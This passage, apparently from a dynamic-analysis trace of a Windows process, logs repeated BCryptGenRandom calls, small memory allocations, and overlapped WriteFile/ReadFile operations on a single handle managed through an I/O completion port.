lpOverlapped=0x35efc18) returned 1 [0202.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.969] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.969] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.969] free (_Block=0x3e305b8) [0202.969] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.969] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.969] free (_Block=0x1fa91d0) [0202.969] free (_Block=0x1fa2ed8) [0202.969] free (_Block=0x1fa90b8) [0202.969] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.970] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.978] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x137, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.978] CloseHandle (hObject=0x2a8) returned 1 [0202.979] free (_Block=0x3df0008) [0202.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.986] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.986] free (_Block=0x3e305b8) [0202.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.986] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.986] free (_Block=0x1fa91d0) [0202.986] free (_Block=0x1fa2ed8) [0202.986] free (_Block=0x1fa90b8) [0202.986] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.987] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.987] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.998] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x46b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.998] CloseHandle (hObject=0x2a8) returned 1 [0202.998] free (_Block=0x3df0008) [0202.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.019] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.020] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.020] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.020] free (_Block=0x3e305b8) [0203.020] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.020] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.021] free (_Block=0x1fa91d0) [0203.021] free (_Block=0x1fa2ed8) [0203.021] free (_Block=0x1fa90b8) [0203.021] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.022] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.034] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.035] CloseHandle (hObject=0x2a8) returned 1 [0203.035] free (_Block=0x3df0008) [0203.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.044] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.044] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.044] free (_Block=0x3e305b8) [0203.044] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.044] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.045] free (_Block=0x1fa91d0) [0203.045] free (_Block=0x1fa2ed8) [0203.045] free (_Block=0x1fa90b8) [0203.045] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.046] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.055] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.055] CloseHandle (hObject=0x2a8) returned 1 [0203.056] free (_Block=0x3df0008) [0203.056] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.064] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.064] free (_Block=0x3e305b8) [0203.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.064] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.065] free (_Block=0x1fa91d0) [0203.065] free (_Block=0x1fa2ed8) [0203.065] free (_Block=0x1fa90b8) [0203.065] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.066] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.096] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.097] CloseHandle (hObject=0x2a8) returned 1 [0203.097] free (_Block=0x3df0008) [0203.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.108] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.108] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.108] free (_Block=0x3e305b8) [0203.108] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.108] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.109] free (_Block=0x1fa91d0) [0203.109] free (_Block=0x1fa2ed8) [0203.109] free (_Block=0x1fa90b8) [0203.109] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.109] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.110] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.138] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.138] CloseHandle (hObject=0x2a8) returned 1 [0203.138] free (_Block=0x3df0008) [0203.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.148] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.148] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.148] free (_Block=0x3e305b8) [0203.148] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.148] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.148] free (_Block=0x1fa91d0) [0203.148] free (_Block=0x1fa2ed8) [0203.148] free (_Block=0x1fa90b8) [0203.148] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.149] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.159] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.159] CloseHandle (hObject=0x2a8) returned 1 [0203.159] free (_Block=0x3df0008) [0203.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.167] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.167] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.167] free (_Block=0x3e305b8) [0203.167] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.167] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.167] free (_Block=0x1fa91d0) [0203.167] free (_Block=0x1fa2ed8) [0203.167] free (_Block=0x1fa90b8) [0203.167] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.168] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.175] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x111, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.176] CloseHandle (hObject=0x2a8) returned 1 [0203.176] free (_Block=0x3df0008) [0203.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.182] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.182] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.183] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.183] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.183] free (_Block=0x3e305b8) [0203.183] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.183] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.183] free (_Block=0x1fa91d0) [0203.183] free (_Block=0x1fa2ed8) [0203.183] free (_Block=0x1fa90b8) [0203.183] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.184] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, 